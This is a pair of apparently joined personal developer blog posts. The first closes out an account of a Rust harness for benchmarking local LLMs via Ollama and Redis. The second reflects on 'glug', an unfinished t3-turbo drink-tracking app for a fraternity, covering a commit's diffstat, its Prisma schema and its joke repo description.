The technical thing I learned was that **regex parsing is fine** for almost any LLM output extraction problem if you constrain the output range tightly. I'd been reaching for JSON-mode prompts and structured-output APIs for things that a 14-line `\d+` regex would solve.

The bigger thing was about benchmarking discipline: **"is this thing biased?" is not a yes/no question without a baseline.** Half the AI Twitter takes I read in 2024 were claims of LLM bias against an implicit baseline of "perfectly uniform behavior," which no statistical process exhibits at finite sample sizes. The boring controls are what make the spicy claims defensible.

If you want a Rust harness for benchmarking any local model, [ai37 is the template](https://github.com/Dax911/ai37). It's 200 lines of Rust, a 46-line Python analyzer, and a Redis dependency. Add a model, change the regex, change the question. The architecture survives.

## Trade-offs

**Why Ollama instead of OpenAI/Anthropic?** Cost. 5,000 inferences at 4¢ each is $200 for a science-fair experiment. Ollama on a Mac Mini is the per-watt cost of leaving a laptop on overnight.

**Why Redis instead of SQLite?** Resilience to mid-run crashes. SQLite would also work; the schema is trivial. The reason I went Redis is I had it running for another project (the Rust pipeline part of [Building A Better Cryptocurrency](/blog/a_better_crypto/)) and adding a hash schema was 5 lines.

**Why filter to 2–99 instead of allowing the boundary?** Because half the failure modes of LLMs are "echoing the prompt back." Filtering 1 and 100 out cleanly distinguishes "the model picked an answer" from "the model parroted the question." You lose two valid sample values; you gain a much cleaner dataset.

## Further reading

- [ai37 on GitHub](https://github.com/Dax911/ai37) — the harness, the analyzer, the (lost) Redis dump.
- [Ollama](https://ollama.ai/) — the local-LLM runner I benchmarked against.
- [`rand` crate docs](https://docs.rs/rand/) — `thread_rng().gen_range(...)` is what makes the control arm honest.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the project Redis was already running for.


---

# Blazingly Fast Drinks: A Repo I Made For The Bit

Canonical: https://blog.skill-issue.dev/blog/glug_blazingly_fast_drinks/
Description: A Clerk + Next.js + Expo turborepo I called "glug" with the description "Blazingly Fast Drinks". The README never mentioned drinks. The repo description carried the entire joke.
Published: 2024-03-19T17:09:37.000Z
Tags: turborepo, clerk, nextjs, expo, trpc, side-quest, shitpost


> **Repo description:** Blazingly Fast Drinks
>
> **README first line:** `# Glug the PMG drink app with Clerk, Next.js, and Expo`

That's [`Dax911/glug`](https://github.com/Dax911/glug). The whole joke is on the GitHub repo card. The README is sober and explanatory. The description is unhinged. This is my favourite kind of repo — a piece of public infrastructure where the only humour I'm allowed is the 350-character box on the listing page.

Today I want to talk about the [`9b188bc — More context`](https://github.com/Dax911/glug/commit/9b188bc) commit on 2024-03-19. It's small. It changed nine files. It's the moment I committed to a project that exists for one joke and a turborepo template.

## What was Glug, briefly

Glug was supposed to be a drink-tracking app for **PMG** — Phi Mu Gamma, my college fraternity. The premise: a phone app where brothers log drinks, the chapter sees aggregate stats, and there's a cross-platform Next.js dashboard for the chapter president to look at. Nothing privacy-respecting, nothing on-chain, nothing remotely interesting from a security perspective. A drink counter.

But "drink counter" doesn't justify the stack I shipped:

```
apps/
  expo/      # React Native via Expo SDK
  nextjs/    # Next.js 13 dashboard
packages/
  api/       # tRPC v10 router
  db/        # Prisma schema + types
```

This is the [`create-t3-turbo`](https://github.com/t3-oss/create-t3-turbo) layout. I'd been using it on every personal project that quarter — same router, same Prisma schema, same Clerk auth, same `apps/expo` + `apps/nextjs` split. The actual purpose of `glug` was to *practice the stack*. The drinks were incidental.

## The "More context" commit

Here's the diff that mattered ([`9b188bc`](https://github.com/Dax911/glug/commit/9b188bc)):

```
.vscode/settings.json                     | 8 ++
README.md                                 | 12 ++++
apps/nextjs/src/pages/index.tsx           | 12 +++-
bun.lockb                                 | (binary)
packages/api/src/context.ts               | 40 +++++++--
packages/api/src/router/auth.ts           | 9 +++
packages/api/src/router/index.ts          | 10 ++++-
packages/api/src/router/post.ts           | 25 ++++++-
packages/db/prisma/schema.prisma          | 57 +++++++++++++--
```

The Prisma schema is the only file with anything approaching design content. Everything else is "I added the auth router import" and "I switched to bun." But the schema reveals what the project was *actually* trying to do:

- A `User` table seeded by Clerk's `userId`.
- A `Drink` table with `(user, timestamp, type, abv)`.
- A `Session` rollup table, time-bucketed.
- An attempt at a `Timebox` table — the README has an "Additional Specs" line at the bottom that reads `Will have timeboxing need to find a way to put that in the DB w the current schema`.

That last line is the thesis of every personal project I started in 2024: **"will have timeboxing."** I was trying to use my fraternity drink-tracker as a way to think about how to bound a session in time, because the same problem was sitting in three other repos I never finished.

## Why the description was the joke

GitHub repo descriptions are 350 characters of cold static text on a search result. They appear in every list view, in every fork chart, in every `gh repo list dax911`. They show up *everywhere* the repo name does. If you treat them as proper marketing copy you get "A drink-tracking application for greek-letter organizations using modern TypeScript tooling."

Nobody has ever clicked on a repo because the description said that.

Whereas "Blazingly Fast Drinks" is the only Rust-meme rendering of "drinks app" possible. It implies:

- The drinks are blazing.
- The drinks are fast.
- I am taking this very seriously.
- I am taking this not at all seriously.

The phrase is recognisably a Reddit `/r/rust` cliche. Drink-tracking is not Rust. The description is fully in conflict with the actual stack — the repo is `tRPC + Prisma + Expo`, *zero* Rust. The collision is the joke.

I think a lot about how much you can get away with by putting humour in the metadata of a serious-looking artifact. Repo descriptions, npm `description` fields, git tag annotations, package `keywords`, the `version` field on a `package.json` you set to `0.0.69` — these are all places where the comedy is invisible to anyone who isn't already there. They're not in the way. They don't hurt the project. They're the public-facing payoff of a project you're never going to finish.

## What this taught me about side-quests

Glug never shipped. I never wrote the timeboxing code. The fraternity never used it. I'm not even sure I told anyone in the chapter about it. That's not what side-quests are for.

What glug *did* teach me:

1. **t3-turbo is the right scaffold for a TS monorepo prototype**, even if you never finish anything in it. I went on to clone this exact layout into [tauri-clerk-auth](https://github.com/Dax911/tauri-clerk-auth) and into the early scaffolds of what became [zera-wallet-demo](/blog/zera_wallet_v3_zkp/). The muscle memory of "tRPC router → Prisma model → Expo screen" is something I can do at midnight without thinking.
2. **Bun was already eating Node's lunch** by March 2024. The diff that landed in this commit replaced `pnpm` with `bun` and shrunk install time on a fresh clone from 90s to 12s. I haven't used `pnpm` for a side-quest since.
3. **A repo with a joke description gets star drift.** People still arrive in `glug` from search occasionally. They open it, see the README, see Clerk + Expo + Prisma, and leave. The description got them to click. The README didn't deserve them.

## The "PMG" footnote

For anyone Googling: yes, PMG is Phi Mu Gamma. Yes, it's a real fraternity. No, this app was never the official chapter tool. There's a Google Sheet that beat me to market by approximately fifteen years.

The drink counter is a Google Sheet. The drink counter has always been a Google Sheet. Every digital tool that has tried to replace the drink counter has failed because the Google Sheet is already deployed, already shared, already has a hundred entries from 2009 still in it. You can't ship faster than `sheets.new`.

The right insight, retrospectively, was to ship a tRPC dashboard that *imported the Sheet*. Which I never did. Which is fine.

## What the side-quest tells you

Side-quests are how you maintain stack fluency. You don't need to ship them. You don't need to scope them. You don't need to tell anyone about them. What you need is a place to type out the boilerplate so that next time you start a *real* project the boilerplate doesn't slow you down.

Glug also taught me the second-order lesson that became my entire 2026: when a side-quest crosses paths with a real product idea, you should let the side-quest die and start the product. I never finished the timeboxing logic in glug. The same problem reappeared in [Cruiser's gossip presence](/blog/cruiser_iroh_gossip_p2p/) — when does a peer cease to be "active" if their last announce is 30s old? The answer in glug would have been "expire from the rollup if no row in 60s." The answer in Cruiser is "evict from the cache if no announce in 90s." Same architecture. Different domain.

That's the gift of a side-quest you stop. You harvest the architecture for the next thing. Glug was the architectural garden bed; Cruiser is the tree that grew out of it.

## Further reading

- [glug on GitHub](https://github.com/Dax911/glug) — the description still says Blazingly Fast Drinks.
- [create-t3-turbo](https://github.com/t3-oss/create-t3-turbo) — the scaffold I've copied into a dozen projects.
- [Cruiser P2P origin post](/blog/cruiser_iroh_gossip_p2p/) — where the timeboxing instinct eventually landed.
- [The PMG Google Sheet](https://en.wikipedia.org/wiki/Phi_Mu_Gamma) — not actually linked here. The Sheet is private. The joke is.


---